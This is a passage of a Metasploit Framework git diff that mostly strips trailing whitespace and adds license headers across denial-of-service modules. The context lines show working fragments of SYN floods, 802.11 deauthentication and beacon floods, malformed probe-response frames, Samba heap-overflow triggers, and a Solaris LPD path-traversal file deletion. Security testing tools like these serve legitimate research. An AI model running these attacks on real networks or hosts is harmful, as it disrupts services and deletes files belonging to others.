execution. - Although arbitrary code execution is theoretically possible, a real-world method of + Although arbitrary code execution is theoretically possible, a real-world method of invoking this consequence has not been proven. In order to do so, one would need to find a situation where a particular ISAPI module loads at an image base address that can be re-allocated by a remote attacker. Limited success was encountered using two separate ISAPI modules. In this scenario, - a second ISAPI module was loaded into the same memory area as the previously + a second ISAPI module was loaded into the same memory area as the previously unloaded module. }, 'Author' => diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index e5c3f75be8..9e7c873b28 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)', 'Description' => %q{ - This module exploits a heap overflow in the Dell OpenManage + This module exploits a heap overflow in the Dell OpenManage Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability exists due to a boundary error within the handling of POST requests, where the application input is set to an overly long file name. @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2004-0331' ], ], 'DisclosureDate' => 'Feb 26 2004')) - + register_options( [ Opt::RPORT(1311), @@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 5b19cfb8f4..4bf02116cd 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS', 'Description' => %q{ The WEBrick::HTTP::DefaultFileHandler in WEBrick in @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Request sent to #{rhost}:#{rport}") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport}") - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end end end diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index a1aeccfd03..5eeefcd9f6 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => [ + 'References' => [ [ 'CVE', '2008-5081' ], - [ 'OSVDB', '50929' ], + [ 'OSVDB', '50929' ], ], 'DisclosureDate' => 'Nov 14 2008') @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary n.l3.id = 0xbeef n.l3.ttl = 128 n.l3.flags = 2 - + n.l4 = Racket::L4::UDP.new n.l4.src_port = 0 n.l4.dst_port = datastore['RPORT'].to_i diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index 806dbfb0ba..50b4d0764a 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Dos + include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Samba lsa_io_privilege_set Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service @@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '34699'], ] )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) - + end def run - + pipe = datastore['SMBPIPE'].downcase - + print_status("Connecting to the SMB service...") connect() smb_login() @@ -61,13 +61,13 @@ class Metasploit3 < Msf::Auxiliary # Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+) # Mac OS X: PC control via memcpy to stack ptr # Solaris: PC control via memcpy to stack ptr - + stub = lsa_open_policy(dcerpc) stub << NDR.long(1) stub << NDR.long(0xffffffff) stub << NDR.long(0x100) stub << "X" * 0x100 - + print_status("Calling the vulnerable function...") begin @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary raise e end end - - disconnect + + disconnect end end diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index fbb24870fc..f6a23af077 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Dos + include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service @@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '34699'], ] )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) - + end def run - + pipe = datastore['SMBPIPE'].downcase - + print_status("Connecting to the SMB service...") connect() smb_login() @@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary raise e end end - + dcerpc.call(0x0f, stub) - - disconnect + + disconnect end end diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index e1e8fec8f5..530ac61dba 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption', 'Description' => %q{ This is a proof of concept denial of service module for Sendmail versions diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index b006318db2..4ae9808aaf 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Solaris LPD Arbitrary File Delete', 'Description' => %q{ This module uses a vulnerability in the Solaris line printer @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. - + }, 'Author' => [ 'hdm', 'Optyx ' ], 'License' => MSF_LICENSE, @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], ] )) - + register_options( [ Opt::RPORT(515), @@ -49,21 +49,21 @@ class Metasploit3 < Msf::Auxiliary end def run - - + + r_hostname = Rex::Text.rand_text_alpha(rand(8)+1) r_user = Rex::Text.rand_text_alpha(rand(8)+1) r_spool = Rex::Text.rand_text_alpha(rand(8)+1) - + # Create a simple control file... control = "H#{r_hostname}\nP#{r_user}\n"; - + # The job ID is squashed down to three decimal digits jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0] # Establish the first connection to the server sock1 = connect(false) - + # Request a cascaded job sock1.put("\x02#{r_hostname}:#{r_spool}\n") res = sock1.get_once @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary print_status("The target did not accept our job request command") return end - + # Theoretically, we could delete multiple files at once, however # the lp daemon will append garbage from memory to the path name # if we don't stick a null byte after the path. Unfortunately, this @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n" dataf = Rex::Text.rand_text_alpha(100)+1 - + print_status("Deleting #{datstore['RPATH']}...") if !( send_file(sock1, 2, "cfA" + jid + r_hostname, control) and @@ -88,28 +88,28 @@ class Metasploit3 < Msf::Auxiliary sock1.close return end - + print_status("Successfully deleted #{datastore['RPATH']} >:-]") sock1.close end def send_file(s, type, name, data='') - + s.put(type.chr + data.length.to_s + " " + name + "\n") res = s.get_once(1) if !(res and res[0] == ?\0) print_status("The target did not accept our control file command (#{name})") return end - + s.put(data) s.put("\x00") res = s.get_once(1) if !(res and res[0] == ?\0) print_status("The target did not accept our control file data (#{name})") return - end - + end + print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length)) return true end diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index eb9a5a7532..e346366d4d 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'todb', 'License' => MSF_LICENSE, - 'References' => + 'References' => [ ['BID', '37670'], ['OSVDB', '61538'], @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('SPORT', [false, 'Source port (defaults to random)']), OptAddress.new('SHOST', [false, 'Source address (defaults to random)']) ]) - + deregister_options('FILTER','PCAPFILE', 'SNAPLEN') end @@ -77,11 +77,10 @@ class Metasploit3 < Msf::Auxiliary n.l4.ack = 0 n.l4.seq = rand(0xffffffff) n.l4.add_option(101,"") - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') pkt = n.pack print_status("#{n.l3.dst_ip}:#{n.l4.dst_port} Sending TCP Syn packet from #{n.l3.src_ip}:#{n.l4.src_port}") capture_sendto(pkt,rhost) close_pcap end end - diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index afba5ba77a..d2f03b111a 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('SPORT', [false, 'The source port (else randomizes)']), OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)']) ]) - + deregister_options('FILTER','PCAPFILE') end @@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary while (num <= 0) or (sent < num) - n.l3.src_ip = srchost + n.l3.src_ip = srchost n.l3.id = rand(0x10000) - n.l3.ttl = rand(128)+128 + n.l3.ttl = rand(128)+128 n.l4.window = rand(4096)+1 n.l4.src_port = sport n.l4.seq = rand(0x100000000) - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') pkt = n.pack diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 133b819349..19ebd19de3 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -1,18 +1,29 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info ={}) super(update_info(info, 'Name' => 'Wireless CTS/RTS Flooder', 'Description' => %q{ This module sends 802.11 CTS/RTS requests to a specific wireless peer, - using the specified source address, + using the specified source address, }, - + 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' @@ -37,21 +48,21 @@ class Metasploit3 < Msf::Auxiliary when 'CTS' frame =create_cts() - else + else print_status("No TYPE selected!!") - return + return end - - open_wifi + + open_wifi print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....") datastore['NUM'].to_i.times do wifi.write(frame) end - end + end def create_rts - + frame = "\xb4" + # Type/SubType "\x00" + # Flags @@ -62,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary return frame end def create_cts - - frame = + + frame = "\xc4" + # Type/SubType "\x00" + # Flags "\xff\x7f" + # Duration diff --git a/modules/auxiliary/dos/wifi/daringphucball.rb b/modules/auxiliary/dos/wifi/daringphucball.rb index 661bffe9e8..32969e2338 100644 --- a/modules/auxiliary/dos/wifi/daringphucball.rb +++ b/modules/auxiliary/dos/wifi/daringphucball.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,21 +19,21 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', 'Description' => %q{ The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) - is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning + is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received - that does not contain valid information element (IE) fields after the fixed-length header. The data - following the fixed-length header is copied over internal kernel structures, resulting in memory + that does not contain valid information element (IE) fields after the fixed-length header. The data + following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'References' => + 'References' => [ ['CVE', '2006-5710'], ['OSVDB', '30180'], @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary [ OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) + ], self.class) end # @@ -54,38 +54,38 @@ class Metasploit3 < Msf::Auxiliary def run open_wifi - + cnt = datastore['COUNT'].to_i - print_status("Creating malicious probe response frame...") + print_status("Creating malicious probe response frame...") frame = create_frame() - + print_status("Sending #{cnt} frames...") cnt.times { wifi.write(frame) } end - + def create_frame bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') caps = [rand(65535)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) # capabilities - + frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) - + return frame - end + end end =begin diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 5c0f96abe7..92d56dbc10 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -1,10 +1,21 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info ={}) super(update_info(info, 'Name' => 'Wireless DEAUTH Flooder', @@ -12,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID. }, - + 'Author' => [ 'Brad Antoniewicz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' @@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary end def run - + print_status("Creating Deauth frame with the following attributes:") print_status("\tDST: #{datastore['ADDR_DST']}") print_status("\tSRC: #{datastore['ADDR_SRC']}") @@ -41,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary wifi.write(create_deauth()) end close_wifi - end - + end + def create_deauth - - seq = [rand(255)].pack('n') + + seq = [rand(255)].pack('n') frame = "\xc0" + # Type/SubType "\x00" + # Flags @@ -53,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary eton(datastore['ADDR_DST']) + # dst addr eton(datastore['ADDR_SRC']) + # src addr eton(datastore['ADDR_BSS']) + # BSSID - seq + # sequence number + seq + # sequence number "\x07\x00" # Reason Code (nonassoc. sta) return frame end diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb index 081512e2b8..6bf8b2be2d 100644 --- a/modules/auxiliary/dos/wifi/fakeap.rb +++ b/modules/auxiliary/dos/wifi/fakeap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,18 +20,18 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Fake Access Point Beacon Flood', 'Description' => %q{ This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool. }, - + 'Author' => [ 'hdm', 'kris katterjohn' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) register_options([ OptInt.new('NUM', [false, "Number of beacons to send"]), @@ -59,39 +59,39 @@ class Metasploit3 < Msf::Auxiliary bssid = Rex::Text.rand_text(6) end seq = [rand(255)].pack('n') - + "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration "\xff\xff\xff\xff\xff\xff" + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x00\x05" + # capability flags - + # ssid tag "\x00" + ssid.length.chr + ssid + - + # supported rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - + # current channel - "\x03" + "\x01" + datastore['CHANNEL'].to_i.chr + - + "\x03" + "\x01" + datastore['CHANNEL'].to_i.chr + + # traffic indication map "\x05" + "\x04" + "\x00\x01\x02\x20" + - + # country information "\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" + - + # erp information "\x2a" + "\x01" + "\x00" + - + # extended supported rates "\x32" + "\x04" + "\x12\x24\x60\x6c" end - + end diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index c7b1557fb8..6fe2377082 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,25 +17,25 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow', 'Description' => %q{ This module exploits a buffer overflow in the NetGear MA521 wireless device driver under Windows XP. When a specific malformed frame (beacon or probe response) - is received by the wireless interface under active scanning mode, the MA521nd5.SYS + is received by the wireless interface under active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. The vulnerability is triggered by an invalid supported rates information element. - - This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a + + This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a NetGear MA521 Cardbus adapter. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation + with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. }, - + 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module 'License' => MSF_LICENSE, 'References' => @@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '30507'], ['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'], ['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip'] - ] + ] )) register_options( [ OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']) - ], self.class) + ], self.class) end def run @@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary ssid = Rex::Text.rand_text(6) bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - - frame = + + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x01\x00" + # capabilities @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary # channel IE "\x03" + "\x01" + channel.chr - + return frame end diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index d98d792634..6384db1961 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,39 +17,39 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow', 'Description' => %q{ This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when malformed probe response frame is received that contains a long SSID field - - This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a + + This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation + with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. - + }, - + 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2006-6125'], ['OSVDB', '30511'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], + ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'], - ] + ] )) register_options( [ OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) + ], self.class) end def run @@ -78,15 +78,15 @@ class Metasploit3 < Msf::Auxiliary def create_probe_response bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x01\x00" + # capabilities @@ -99,10 +99,10 @@ class Metasploit3 < Msf::Auxiliary # channel IE "\x03" + "\x01" + channel.chr - + return frame - end + end end =begin diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb index cf0d928f48..60895ec21a 100644 --- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb +++ b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,40 +19,40 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response', 'Description' => %q{ - This module exploits a firmware-level vulnerability in a variety of + This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. This - flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, + flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards). }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'], - ['WVE', '2006-0064'] + ['WVE', '2006-0064'] ] )) register_options( [ OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) + ], self.class) end def run open_wifi - + cnt = datastore['COUNT'].to_i - print_status("Creating malicious probe response frame...") + print_status("Creating malicious probe response frame...") frame = create_frame() - + print_status("Sending #{cnt} frames...") cnt.times { wifi.write(frame) } end @@ -61,21 +61,21 @@ class Metasploit3 < Msf::Auxiliary bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') caps = [rand(65535)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) + # capabilities [0, 0].pack('CC') # Type=SSID(0) Length=0 - + return frame - end + end end diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb index 6886012078..d83a342fd4 100644 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ b/modules/auxiliary/dos/wifi/wifun.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Test Module', 'Description' => %q{ This module is a test of the wireless packet injection system. Please see external/ruby-lorcon/README for more information. }, - + 'Author' => [ 'hdm' ], 'License' => 